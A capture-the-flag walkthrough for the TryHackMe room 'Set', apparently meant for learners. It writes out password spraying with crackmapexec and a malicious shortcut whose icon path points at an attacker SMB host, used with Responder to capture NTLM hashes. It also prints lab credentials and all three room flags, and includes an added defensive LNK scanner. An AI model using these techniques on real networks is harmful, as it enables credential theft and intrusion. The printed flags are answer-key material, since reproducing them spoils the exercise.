Set TryHackMe Walkthrough
--
By Shamsher Khan. This is a writeup of the TryHackMe room "Set".
Room link: https://tryhackme.com/room/set
Note: This room is only available to THM Premium members (those who purchased a premium membership).
Walkthrough — Set
Story
Once again you find yourself on the internal network of the Windcorp Corporation. This tasted so good last time you were there, you came back for more. However, they managed to secure the Domain Controller this time, so you need to find another server and your first scan discovered Set.
Set is used as a platform for developers and has had some problems in the recent past. They had to reset a lot of users and restore backups (maybe you were not the only hacker on their network?). So they decided to make sure all users used proper passwords and closed off some of the loose policies.
Can you still find a way in? Are some users more equal than others? Or more sloppy? And maybe you need to think outside the box a little bit to circumvent their new security controls… Happy Hacking! @4nqr34z and @theart42
Let's start with enumeration first.
nmap
nmap -p- -sC -sV 10.10.177.99
We have three ports open: MSRPC, HTTPS, and SMB. The scan output also tells us to add set.windcorp.thm to our hosts file. There is also a Windows Remote Management port open on 5985 and an additional MSRPC port on 49666. Let's first look at the website and then move on to SMB.
Add set.windcorp.thm (pointing at 10.10.177.99) to /etc/hosts.
HTTPS
Navigating to the homepage of the HTTPS site returns a company website
Directory Searching
gobuster dir -u https://set.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
gobuster dir -u https://set.windcorp.thm/assets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
These appear to be directories that host the source code of the website; we can look through these files in the browser's developer tools. Within the source of the website we can see a hidden testimonials section containing usernames. The room hint says the company was previously hacked, which makes those usernames valuable.
Visit view-source:https://set.windcorp.thm/assets/data/users.xml
This file contains many usernames belonging to the company.
We can reduce these to bare usernames and use them to find valid accounts on the Set domain. The following commands download the XML file, extract the email addresses, strip the tags and the @windcorp.thm suffix, and store the usernames in a text file.
curl -k https://set.windcorp.thm/assets/data/users.xml -o users.xml
Extracting the usernames from the users.xml file (the closing tag is replaced by a newline because xmllint may print all matched nodes on a single line):
xmllint --xpath "//row/email" users.xml | sed -e 's/<email>//g' -e 's/<\/email>/\n/g' -e 's/@windcorp.thm//g' | grep -v '^$' > users.txt
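The same extraction done in Python, as an added example (not the write-up's own command): it reads the `<row>`/`<email>` layout that the XPath above targets with ElementTree, so it does not depend on how xmllint separates matched nodes, and it also drops duplicates and addresses from other domains. The `users.xml` content embedded below is a constructed sample, not the real file from the room.

```python
"""Pull account names out of a users.xml like the one served from
/assets/data/users.xml.  Added example, not the write-up's own command.
SAMPLE_XML is a constructed stand-in for the real file."""
import xml.etree.ElementTree as ET

# Constructed sample in the <row><email>…</email></row> layout implied by the
# XPath "//row/email".  Mixed case, a row without an email, a duplicate and a
# foreign-domain address are included to exercise the edge cases.
SAMPLE_XML = """<?xml version="1.0"?>
<users>
  <row><name>Myrtle Owen</name><email>myrtleowe@windcorp.thm</email></row>
  <row><name>Michelle Watson</name><email>MichelleWat@WindCorp.thm</email></row>
  <row><name>No Mail</name></row>
  <row><name>Duplicate</name><email>MYRTLEOWE@windcorp.thm</email></row>
  <row><name>Contractor</name><email>contractor@example.com</email></row>
</users>
"""


def extract_usernames(xml_text, domain="windcorp.thm"):
    """Return the local part of every <row>/<email> that belongs to `domain`,
    de-duplicated case-insensitively and kept in document order."""
    root = ET.fromstring(xml_text)
    seen, users = set(), []
    for node in root.iterfind(".//row/email"):
        addr = (node.text or "").strip()
        if "@" not in addr:
            continue
        local, _, mail_domain = addr.rpartition("@")
        if not local or mail_domain.lower() != domain.lower():
            continue                      # skip accounts outside the target domain
        if local.lower() in seen:
            continue                      # same account listed twice
        seen.add(local.lower())
        users.append(local)
    return users


def to_wordlist(users):
    """One username per line, newline-terminated, in the shape users.txt had."""
    return "".join(u + "\n" for u in users)


if __name__ == "__main__":
    print(to_wordlist(extract_usernames(SAMPLE_XML)), end="")
```

Run it against the downloaded file with `extract_usernames(open("users.xml").read())` and write `to_wordlist(...)` out to `users.txt`.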
SMB
A quick smbclient attempt reveals that we need credentials to enumerate SMB.
We can find valid accounts by testing the usernames we gathered from the website against a password list (rockyou or a common-passwords list) with crackmapexec.
crackmapexec smb set.windcorp.thm -u users.txt -p rockyou.txt
The valid credentials are myrtleowe:Passw@rd.
Listing the shares with the newfound credentials:
smbclient -L //set.windcorp.thm -U myrtleowe
If we log on to the Files share we see the following.
The Info.txt file contains the first flag of the room. These credentials do not yet give us WinRM access for evil-winrm.
Flag 1: THM{4c66e2b8d4c45a65e6a7d0c7ad4a5d7ff245dc14}
We are counting on someone unzipping the files, because the note says they will review them.
Not too commonly known: you can change the icon path in a LNK file and point it at an SMB server that captures the user's password hash.
The beauty of this trick is that the user does not even have to click the LNK. Opening a window that displays the contents of a folder containing such a file is enough. First we create our LNK using this excellent tool: http://www.mamachine.org/mslink/index.en.html
Note: For some reason I had to deploy my machine again.
Machine IP: 10.10.169.112
./mslink_v1.3.sh -l notimportant -n shortcut -i \\\\10.2.12.26\\MichelleWat -o shortcut.lnk
zip myfile.zip shortcut.lnk
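The "someone will review the zip" workflow is also where this trick gets caught: a reviewer can scan an archive for .lnk entries whose icon location (or working directory / relative path) points at a UNC host outside the organisation before anything is extracted into an Explorer window. The following is an added example, not part of the original write-up or of mslink. It walks the fixed-order StringData section of the Shell Link format (MS-SHLLINK) and flags UNC hosts that are not on an allow-list. The archive and the .lnk stubs it contains are constructed inside the script as test fixtures; the host names and the trusted-hosts list are assumptions.

```python
"""Scan a zip archive for Windows shortcuts (.lnk) whose IconLocation, working
directory or relative path points at a UNC share on an untrusted host.
Added example for reviewers of uploaded archives; not part of the write-up or
of mslink.  Layout per MS-SHLLINK: 0x4C-byte header, optional LinkTargetIDList
and LinkInfo, then StringData items in a fixed order."""
import io
import re
import struct
import zipfile

HEADER_SIZE = 0x4C
LNK_MAGIC = b"\x4c\x00\x00\x00"                                  # HeaderSize field
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")    # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits that decide which optional structures are present.
FLAG_HAS_IDLIST, FLAG_HAS_LINKINFO = 0x01, 0x02
FLAG_HAS_NAME, FLAG_HAS_RELPATH, FLAG_HAS_WORKDIR = 0x04, 0x08, 0x10
FLAG_HAS_ARGS, FLAG_HAS_ICON, FLAG_UNICODE = 0x20, 0x40, 0x80

# StringData items appear in this order, each present only if its flag is set.
STRING_ITEMS = ((FLAG_HAS_NAME, "name"), (FLAG_HAS_RELPATH, "relative_path"),
                (FLAG_HAS_WORKDIR, "working_dir"), (FLAG_HAS_ARGS, "arguments"),
                (FLAG_HAS_ICON, "icon_location"))

_UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")


def parse_string_data(data):
    """Return the StringData strings of a .lnk as a dict."""
    if len(data) < HEADER_SIZE or data[:4] != LNK_MAGIC or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:        # IDListSize (2 bytes) + the ID list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINKINFO:      # LinkInfoSize (4 bytes) counts the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for flag, key in STRING_ITEMS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & FLAG_UNICODE else 1
        raw = data[pos:pos + width * count]
        strings[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        pos += width * count
    return strings


def unc_host(path):
    """Host part of a \\\\host\\share path, or None for local paths."""
    m = _UNC_HOST.match(path or "")
    return m.group(1) if m else None


def assess_lnk(data, trusted_hosts=()):
    """(field, host) pairs for each path field pointing at an untrusted UNC host.
    IconLocation matters most: Explorer resolves it when the folder is shown."""
    trusted = {h.lower() for h in trusted_hosts}
    strings = parse_string_data(data)
    findings = []
    for key in ("icon_location", "working_dir", "relative_path"):
        host = unc_host(strings.get(key))
        if host and host.lower() not in trusted:
            findings.append((key, host))
    return findings


def scan_zip(zip_bytes, trusted_hosts=()):
    """Map every .lnk entry in the archive to its findings (empty list = clean)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                report[info.filename] = assess_lnk(zf.read(info), trusted_hosts)
            except ValueError as err:
                report[info.filename] = [("parse_error", str(err))]
    return report


def _stub_lnk(icon_location=None):
    """Constructed test fixture: header plus StringData only (no IDList, no
    LinkInfo), which is enough to exercise the parser above."""
    flags = FLAG_UNICODE | (FLAG_HAS_ICON if icon_location else 0)
    header = (LNK_MAGIC + LNK_CLSID + struct.pack("<I", flags)).ljust(HEADER_SIZE, b"\x00")
    body = b""
    if icon_location:
        body = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    return header + body


def build_sample_zip():
    """Constructed archive: a text file and three shortcuts; only shortcut.lnk
    points at a host (192.0.2.10, a documentation address) off the allow-list."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("review/notes.txt", "please review the attached files\n")
        zf.writestr("review/readme.lnk", _stub_lnk(r"\\FILESRV01\icons\doc.ico"))
        zf.writestr("review/shortcut.lnk", _stub_lnk(r"\\192.0.2.10\share"))
        zf.writestr("review/plain.lnk", _stub_lnk())
    return buf.getvalue()


if __name__ == "__main__":
    for name, found in scan_zip(build_sample_zip(), trusted_hosts=["FILESRV01"]).items():
        print(name, "SUSPICIOUS" if found else "ok", found)
```

The allow-list is deliberately the only thing that separates a legitimate file-server icon from a rogue one: inside a domain, shortcuts that reference internal servers are normal, so the useful signal is any host that is not a known internal share server, which in this room would be the attacker's VPN address.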
Start Responder
responder -I tun0
Upload the zip file to the Files share.
Search 10.10.169.112 (the machine IP) in the browser.
Yes, we got the hash.
Now crack this hash for the user MichelleWat.
User: MichelleWat
Password: !!!MICKEYmouse
We try WinRM and this time we are in luck. Install the evil-winrm tool:
gem install evil-winrm
And here we get Flag 2: THM{690798b1780964f5f51cebd854da5a2ea236ebb5}
We spot a listening port we didn't see from the outside.
Let's investigate the process sitting on PID 4736. It happens that you forget a command's syntax (it happens to me quite often); the PowerShell Get-Help command does the job.
get-process
It is listening on port 2805. A bit more research reveals there could be a serious vulnerability via .NET deserialization.
And the version looks really promising indeed! So we need to get to that port. Port forwarding using msf? Try uploading a meterpreter.
We start with uploading plink.exe, one of the command-line SSH tools for Windows. Make sure you use the new version!
Downloading plink.exe:
Assuming that we don't have plink.exe on our Windows machine, let's browse to https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html and download the file:
There are two binaries available, 32-bit and 64-bit (there are also ARM builds for Windows if you scroll down).
Upload plink.exe to the deployed machine by serving it from the attacking box:
python -m SimpleHTTPServer 80
Because my TryHackMe subscription expired, I couldn't explore this further for my writeup.
So here is Flag 3: THM{934f7faaadab3b040edab8214789114c9d3049dd}
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthroughs:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share it to help others with similar interests! Feedback is always welcome!